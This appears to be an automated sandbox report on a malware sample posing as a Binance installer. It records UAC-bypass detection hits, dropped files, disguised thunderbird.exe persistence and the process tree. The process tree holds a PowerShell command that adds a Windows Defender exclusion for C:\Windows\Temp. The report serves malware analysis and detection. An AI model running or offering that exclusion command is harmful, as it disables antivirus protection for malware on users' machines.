Source: C:\Windows\Temp\AppsLo.exe	Code function: String function: 008E0726 appears 34 times

Source: MiJZ3z4t5K.exe

Static PE information: invalid certificate

Source: Qjsync.exe.11.dr

Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: smomwacaueqiut.11.dr

Static PE information: Number of sections : 12 > 10

Source: MiJZ3z4t5K.exe, 00000000.00000000.2091136220.0000000000DB9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebinance-setup.exe0 vs MiJZ3z4t5K.exe
Source: MiJZ3z4t5K.exe, 00000000.00000002.3341864930.00000000014CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MiJZ3z4t5K.exe

Source: 18.2.cmd.exe.32207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.cmd.exe.51c3a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.53b7acd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.50bba00.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.cmd.exe.52096cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.51016cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5100acd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.cmd.exe.5208acd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.Qjsync.exe.26ebaed.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.Qjsync.exe.26a6a20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.5372a00.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.Qjsync.exe.26ec6ed.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.53b86cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.expl.evad.winEXE@27/52@2/3

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008DFE21 FormatMessageW,GetLastError,LocalFree,

6_2_008DFE21

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008A45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		6_2_008A45EE
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F545EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		7_2_00F545EE

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008E304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

6_2_008E304F

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008C6B88 ChangeServiceConfigW,GetLastError,

6_2_008C6B88

Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe

File created: C:\Users\user\AppData\Roaming\GZManage

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

File created: C:\Windows\Temp\AppsLo.exe

Jump to behavior

Source: C:\Windows\Temp\AppsLo.exe	Command line argument: cabinet.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: msi.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: version.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: wininet.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: comres.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: clbcatq.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: msasn1.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: crypt32.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: feclient.dll	6_2_008A1070
Source: C:\Windows\Temp\AppsLo.exe	Command line argument: cabinet.dll	6_2_008A1070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: cabinet.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: msi.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: version.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: wininet.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: comres.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: clbcatq.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: msasn1.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: crypt32.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: feclient.dll	7_2_00F51070
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Command line argument: cabinet.dll	7_2_00F51070

Source: MiJZ3z4t5K.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MiJZ3z4t5K.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name, %d+18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence';
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: AppsLo.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: AppsLo.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: unknown	Process created: C:\Users\user\Desktop\MiJZ3z4t5K.exe "C:\Users\user\Desktop\MiJZ3z4t5K.exe"
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\Temp\AppsLo.exe "C:\Windows\Temp\AppsLo.exe"
Source: C:\Windows\Temp\AppsLo.exe	Process created: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe "C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe" -burn.clean.room="C:\Windows\Temp\AppsLo.exe" -burn.filehandle.attached=524 -burn.filehandle.self=532
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Process created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe "C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe"
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\Temp\AppsLo.exe "C:\Windows\Temp\AppsLo.exe"	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Process created: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe "C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe" -burn.clean.room="C:\Windows\Temp\AppsLo.exe" -burn.filehandle.attached=524 -burn.filehandle.self=532	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Process created: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe "C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe"	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
